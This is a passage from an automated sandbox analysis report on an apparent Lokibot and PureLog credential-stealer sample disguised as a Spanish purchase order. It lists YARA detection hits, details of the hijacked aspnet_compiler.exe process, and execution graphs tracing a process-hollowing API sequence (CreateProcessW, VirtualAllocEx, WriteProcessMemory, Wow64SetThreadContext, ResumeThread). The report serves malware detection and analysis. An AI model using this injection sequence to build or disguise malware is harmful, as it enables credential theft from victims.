                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2086467248.0000000000C42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:11:02:05
                                      Start date:24/10/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                      Imagebase:0x9c0000
                                      File size:56'368 bytes
                                      MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3328760940.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:21.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:35
                                        Total number of Limit Nodes:2
                                        execution_graph 2484 2f20040 2485 2f200cd CreateProcessW 2484->2485 2487 2f20234 2485->2487 2488 2f205a0 VirtualAllocEx 2489 2f20657 2488->2489 2498 2f206a0 2499 2f206a8 WriteProcessMemory 2498->2499 2501 2f20788 2499->2501 2502 2f207e0 2503 2f207e8 ResumeThread 2502->2503 2504 2f20870 2503->2504 2505 2f20370 2506 2f20378 Wow64SetThreadContext 2505->2506 2508 2f20434 2506->2508 2509 2f20481 2510 2f20488 ReadProcessMemory 2509->2510 2511 2f20547 2510->2511 2512 2f20006 2513 2f20016 CreateProcessW 2512->2513 2515 2f20234 2513->2515 2515->2515 2480 2f20378 2481 2f203d6 2480->2481 2482 2f203eb Wow64SetThreadContext 2480->2482 2481->2482 2483 2f20434 2482->2483 2490 2f206a8 2491 2f20711 2490->2491 2492 2f20726 WriteProcessMemory 2490->2492 2491->2492 2493 2f20788 2492->2493 2494 2f207e8 ResumeThread 2495 2f20870 2494->2495 2496 2f20488 ReadProcessMemory 2497 2f20547 2496->2497 2516 2f20598 2517 2f205a0 VirtualAllocEx 2516->2517 2518 2f20657 2517->2518

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 14de498-14de4bd 1 14de4bf 0->1 2 14de4c4-14de4ec 0->2 1->2 3 14de592-14de5a3 2->3 4 14de5a5-14de5b4 3->4 5 14de5b6-14de5bd 3->5 6 14de5c4-14de5ca 4->6 5->6 7 14de4f8-14de514 6->7 8 14de51d-14de51e 7->8 9 14de516 7->9 10 14de63c-14de645 8->10 9->3 9->8 9->10 11 14de5cf-14de5e6 9->11 12 14de52e-14de539 9->12 13 14de5eb-14de5ef 9->13 14 14de584-14de58d 9->14 15 14de4f1 9->15 16 14de560-14de57f 9->16 17 14de523-14de52c 9->17 18 14de622-14de637 9->18 11->7 22 14de542-14de55e 12->22 19 14de5f1-14de600 13->19 20 14de602-14de609 13->20 14->7 15->7 16->7 17->7 18->7 21 14de610-14de61d 19->21 20->21 21->7 22->7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gnP~$gnP~$nWc
                                        • API String ID: 0-1571174616
                                        • Opcode ID: f7f82d0d48cc90d3b5c0c02c092762d00d4ecfb6b50206ebe1f09c124abd2578
                                        • Instruction ID: 2d1f70ed631d360565eda5e1d6cbaa3981932a1cfd8fe1c5dd61882223d11bf5
                                        • Opcode Fuzzy Hash: f7f82d0d48cc90d3b5c0c02c092762d00d4ecfb6b50206ebe1f09c124abd2578
                                        • Instruction Fuzzy Hash: 2D4147B4D0521ACFDF44CFAAD4546EEFBB1EB49300F14942AD425BB260D3389642CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 23 2f20006-2f20014 24 2f20016-2f20027 23->24 25 2f20029-2f200cb 23->25 24->25 27 2f200e2-2f200f0 25->27 28 2f200cd-2f200df 25->28 29 2f200f2-2f20104 27->29 30 2f20107-2f20143 27->30 28->27 29->30 31 2f20157-2f20232 CreateProcessW 30->31 32 2f20145-2f20154 30->32 36 2f20234-2f2023a 31->36 37 2f2023b-2f20304 31->37 32->31 36->37 46 2f20306-2f2032f 37->46 47 2f2033a-2f20345 37->47 46->47 51 2f20346 47->51 51->51
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F2021F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 405e8403bf393b08956965fc2da4442fb4a1e3326134139058b8bbad2fb5ad5f
                                        • Instruction ID: 73419561bcf5981697d46f36fb2eabb87db76c3e88d147cf41b5bdc31d06f677
                                        • Opcode Fuzzy Hash: 405e8403bf393b08956965fc2da4442fb4a1e3326134139058b8bbad2fb5ad5f
                                        • Instruction Fuzzy Hash: 8A91F275C042699FCB25CFA8C850BDDBBB1AF1A304F0490EAE548B7261DB749A89CF54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 52 2f20040-2f200cb 53 2f200e2-2f200f0 52->53 54 2f200cd-2f200df 52->54 55 2f200f2-2f20104 53->55 56 2f20107-2f20143 53->56 54->53 55->56 57 2f20157-2f20232 CreateProcessW 56->57 58 2f20145-2f20154 56->58 62 2f20234-2f2023a 57->62 63 2f2023b-2f20304 57->63 58->57 62->63 72 2f20306-2f2032f 63->72 73 2f2033a-2f20345 63->73 72->73 77 2f20346 73->77 77->77
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F2021F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: eee6896c612db332cb38c620ea3554a10ef66ce9f66802d1eff84af05c73ed71
                                        • Instruction ID: 1daa4e738b2d7242e77468c4ef3102c00719732933676b6c1bba7462418c00de
                                        • Opcode Fuzzy Hash: eee6896c612db332cb38c620ea3554a10ef66ce9f66802d1eff84af05c73ed71
                                        • Instruction Fuzzy Hash: 1B81C075C0022DDFDB25CFA8D944BDDBBB5AF19304F0090AAE548B7260DB749A89CF54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 78 2f206a0-2f2070f 80 2f20711-2f20723 78->80 81 2f20726-2f20786 WriteProcessMemory 78->81 80->81 82 2f20788-2f2078e 81->82 83 2f2078f-2f207cd 81->83 82->83
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F20776
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 4a17966b9b8d17a54a19dc7bce00191208409b4376a86e36954f607f1868571d
                                        • Instruction ID: 83f7d134054fcfa9dcd8ac1e57f71a9b925e04e2234490e192cee600fc7d9b85
                                        • Opcode Fuzzy Hash: 4a17966b9b8d17a54a19dc7bce00191208409b4376a86e36954f607f1868571d
                                        • Instruction Fuzzy Hash: 33418BB5D002589FCF00CFA9D984ADEFBF1BB19314F24902AE918B7210D335AA45CF64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 86 2f206a8-2f2070f 87 2f20711-2f20723 86->87 88 2f20726-2f20786 WriteProcessMemory 86->88 87->88 89 2f20788-2f2078e 88->89 90 2f2078f-2f207cd 88->90 89->90
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F20776
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 2455a77aea730116332472e03ac66a91ba02eb72b731eabf9251a2e15980466b
                                        • Instruction ID: 2abcedf41a88f6b1182bd9b66cb791b9339dc78df870ab75530f7a4aeee628b0
                                        • Opcode Fuzzy Hash: 2455a77aea730116332472e03ac66a91ba02eb72b731eabf9251a2e15980466b
                                        • Instruction Fuzzy Hash: 0B4169B9D002589FCB00CFA9D984ADEFBF5BB19314F24902AE918B7250D375AA45CF64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 93 2f20481-2f20545 ReadProcessMemory 95 2f20547-2f2054d 93->95 96 2f2054e-2f2058c 93->96 95->96
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F20535
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: d733b34583264eb0dc79a5db73e964b3b140a5a08ff49496ac72216cabdc8321
                                        • Instruction ID: 08e375f8431203d4c9652a0ba3d37386dede75c565b7cffd0f748974d221f17c
                                        • Opcode Fuzzy Hash: d733b34583264eb0dc79a5db73e964b3b140a5a08ff49496ac72216cabdc8321
                                        • Instruction Fuzzy Hash: AE4158B9D042589FCB10CFA9D984ADEFBB5BB19310F10906AE914B7310D335A945CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 104 2f20598-2f2059e 105 2f205a0-2f20655 VirtualAllocEx 104->105 106 2f20657-2f2065d 105->106 107 2f2065e-2f20694 105->107 106->107
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F20645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 17c75244568750e08f6ebebc36a0a75989f007cbb50b7604b6dc3588f7154014
                                        • Instruction ID: f9e55beeb9177cd52fe6b737d51be6554418e8f5aa2f822d74b5d034cad37071
                                        • Opcode Fuzzy Hash: 17c75244568750e08f6ebebc36a0a75989f007cbb50b7604b6dc3588f7154014
                                        • Instruction Fuzzy Hash: 0D3158B9D042589FCF10CFA9D984ADEFBB5BB59310F10901AE918B7310D335A946CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 99 2f20488-2f20545 ReadProcessMemory 100 2f20547-2f2054d 99->100 101 2f2054e-2f2058c 99->101 100->101
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F20535
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 04c891a9b2532e77279e1da85146f7526d436d20ed4db52008b3aa26b3798132
                                        • Instruction ID: ca8020089079d40b226591fa0bae2938b2a12948ab5018d8b318c839e29fdfa8
                                        • Opcode Fuzzy Hash: 04c891a9b2532e77279e1da85146f7526d436d20ed4db52008b3aa26b3798132
                                        • Instruction Fuzzy Hash: FF3167B9D042589FCF10CFAAD984ADEFBB5BB19310F10906AE914B7310D335A945CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 110 2f205a0-2f20655 VirtualAllocEx 111 2f20657-2f2065d 110->111 112 2f2065e-2f20694 110->112 111->112
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F20645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: b45a485809535bafdcd75b04e813770947dc776e16b2e744aeff644eb1b4a9fb
                                        • Instruction ID: b6577e456ba843f57c8625fa5a7c42aa170d5b5328b122c66fc33354b6b7c0b3
                                        • Opcode Fuzzy Hash: b45a485809535bafdcd75b04e813770947dc776e16b2e744aeff644eb1b4a9fb
                                        • Instruction Fuzzy Hash: 173157B9D04258DFCF10CFA9D984A9EFBB5BB59310F10A02AE918B7310D335A945CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 115 2f20370-2f203d4 117 2f203d6-2f203e8 115->117 118 2f203eb-2f20432 Wow64SetThreadContext 115->118 117->118 119 2f20434-2f2043a 118->119 120 2f2043b-2f20473 118->120 119->120
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 02F20422
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 3956abf182801ab0714867c53898d8310f03b4109159859894981a60c9031807
                                        • Instruction ID: 76ba207eb22fe61b5d3c175970bca838489c2b8effd2bd51f1118cd7f5f869d2
                                        • Opcode Fuzzy Hash: 3956abf182801ab0714867c53898d8310f03b4109159859894981a60c9031807
                                        • Instruction Fuzzy Hash: DA31CAB5D042589FCB10CFAAD584ADEFBF1BF49314F24802AE518B7240C378A949CF64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 123 2f20378-2f203d4 124 2f203d6-2f203e8 123->124 125 2f203eb-2f20432 Wow64SetThreadContext 123->125 124->125 126 2f20434-2f2043a 125->126 127 2f2043b-2f20473 125->127 126->127
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 02F20422
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 5798a8e701fe8a18076354f478a6f430c9c012dc692cb514b015cacbe783e5d4
                                        • Instruction ID: a525cab5d55337f712f1582aeb3eb29a30ee97f33c8f02e84d1694f373b51cd5
                                        • Opcode Fuzzy Hash: 5798a8e701fe8a18076354f478a6f430c9c012dc692cb514b015cacbe783e5d4
                                        • Instruction Fuzzy Hash: 8A31AAB5D012589FCB10CFAAD584ADEFBF1BB49314F24902AE518B7250C378A949CF64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 130 2f207e0-2f2086e ResumeThread 132 2f20870-2f20876 130->132 133 2f20877-2f208a5 130->133 132->133
                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 02F2085E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 29a37337e074653d77ed436b3ea834e3202bb4e7fb53f1061710c8d0d243bd41
                                        • Instruction ID: 9568993e73123cb0b65b61bd0c04d26e16489f7ac7e0c67f2eaee495d452e262
                                        • Opcode Fuzzy Hash: 29a37337e074653d77ed436b3ea834e3202bb4e7fb53f1061710c8d0d243bd41
                                        • Instruction Fuzzy Hash: DA21ACB5D002189FCB10CFA9D484ADEFBF4EB09310F14905AE918B3310D335A945CFA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 136 2f207e8-2f2086e ResumeThread 137 2f20870-2f20876 136->137 138 2f20877-2f208a5 136->138 137->138
                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 02F2085E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 00943184d497ff0c6eaf807698f41535bfc66af53c2091140eb13a7229b103f4
                                        • Instruction ID: 33f3450af583f1f42df0427b596b05266e88c283c4274d648a8d65148d642eb7
                                        • Opcode Fuzzy Hash: 00943184d497ff0c6eaf807698f41535bfc66af53c2091140eb13a7229b103f4
                                        • Instruction Fuzzy Hash: 342186B9D002189FCB10CFA9D584ADEFBF4AB09324F24906AE918B7310D335A945CFA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 141 14dcf48-14dcf66 142 14dcf6d-14dcf6f 141->142 143 14dcf68 141->143 144 14dcf78-14dcfd0 142->144 143->142 151 14dcf8c-14dcf91 144->151 152 14dcfd2-14dcfd3 144->152 154 14dcf96-14dcf9a 151->154 155 14dcf93-14dcf94 151->155 152->151 155->154
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TJbq
                                        • API String ID: 0-1760495472
                                        • Opcode ID: e13a8e37a30da8ef784b4f78125f2f28bb0a2bf61efeecce06f8784f271c3f65
                                        • Instruction ID: 626bd64d60ce4850813d8da0be5602f883358ce5cad81d9065c986e0d8b6135c
                                        • Opcode Fuzzy Hash: e13a8e37a30da8ef784b4f78125f2f28bb0a2bf61efeecce06f8784f271c3f65
                                        • Instruction Fuzzy Hash: 5311EC70E4420A9FCF44DFB9D5A15EEBBF5BF49200F1085AED519A32A4DB309A41CB90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 156 14d4945-14d4981 call 14dcf48 159 14d4987-14d79a9 156->159 162 14d79af-14db482 159->162 163 14db488-14db493 159->163 162->163 165 14db49c 163->165 166 14db495 163->166 166->165
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: 3f8efc012c13c321d2e06c8343681e503750cd64f68b36371239dc18b19fa1f9
                                        • Instruction ID: a970caf09edf13203c7cfc7323381f4a563c5966497046c7fb0a0e7e201dc202
                                        • Opcode Fuzzy Hash: 3f8efc012c13c321d2e06c8343681e503750cd64f68b36371239dc18b19fa1f9
                                        • Instruction Fuzzy Hash: 4A014C74906229CFDF20CF18D854BF8BBB4FB4A305F0150EAC81EA3612D7341A858F11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 20e107847eb7c63774ae67d3c327449e70a3cc9abf9c1a86dc79d35b605a4d5e
                                        • Instruction ID: 0fa2f40f7c2dab01e830bb268be17ed56fc5be5bb8d8abf475bb46345ff270a7
                                        • Opcode Fuzzy Hash: 20e107847eb7c63774ae67d3c327449e70a3cc9abf9c1a86dc79d35b605a4d5e
                                        • Instruction Fuzzy Hash: 2C513474E05209CFDF00DFA9D865AEEBBF5FF89300F00916AE805A7261D7B09902CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db02707eb4c3273a3033a047097667edc495359a6829ee82f1a0674b2ae1d034
                                        • Instruction ID: 5df20d51bd3aa17758b53a1fa402f2edfda3fd01cfb408a21a055fcb840be12d
                                        • Opcode Fuzzy Hash: db02707eb4c3273a3033a047097667edc495359a6829ee82f1a0674b2ae1d034
                                        • Instruction Fuzzy Hash: 5F411374E05209CFDF04DFA9D855AAEBBF9FF89300F10A16AE815A7361D7B09902CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b31be8e09a06b9984c28dd7afe434668c5e20b3c4fe2508e2c2c014f33860d85
                                        • Instruction ID: 1ba8512b06b04dd60b889f3062ec55e495acc3b8d1994aeaa983c162fe55bd4d
                                        • Opcode Fuzzy Hash: b31be8e09a06b9984c28dd7afe434668c5e20b3c4fe2508e2c2c014f33860d85
                                        • Instruction Fuzzy Hash: 1D4117B4E04209DFDF00DFA9E954AEEBBB5AF49300F04902AE415BB361DB349941CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f29874d2be680b76c83f055971b1649601de90553126fccfbaf000dd1341d51
                                        • Instruction ID: e28d951f9463973bcce6f50583ad1382844b9c91a548fe9ba8717f6ba046ce20
                                        • Opcode Fuzzy Hash: 8f29874d2be680b76c83f055971b1649601de90553126fccfbaf000dd1341d51
                                        • Instruction Fuzzy Hash: 534138B4E042099FDF04DFA9D4649EEBBF6EF99304F108566E405A7361DB309902CF62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 932ba0fa8654d371041567c6aa9938813ffc5352c3d2ae8a865beacdb2062c32
                                        • Instruction ID: e975ac9dd57c1c0a2d7a471e2d1b177d6fd220fc8a5b3ff7a2d59b506141838e
                                        • Opcode Fuzzy Hash: 932ba0fa8654d371041567c6aa9938813ffc5352c3d2ae8a865beacdb2062c32
                                        • Instruction Fuzzy Hash: F141D078D043088BDB28DFB1E99899EBFB2FB8A301F20D16AD849A7354DB350845CF55
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8be1ec933337c1c3fcc175bd9a2a994f6bed758937b58d8c525c3ab756bd46c
                                        • Instruction ID: e0326f46ef3bf4fb96a1d7af6b99cec1518909b8e5aa86244efc468f62b2a1ca
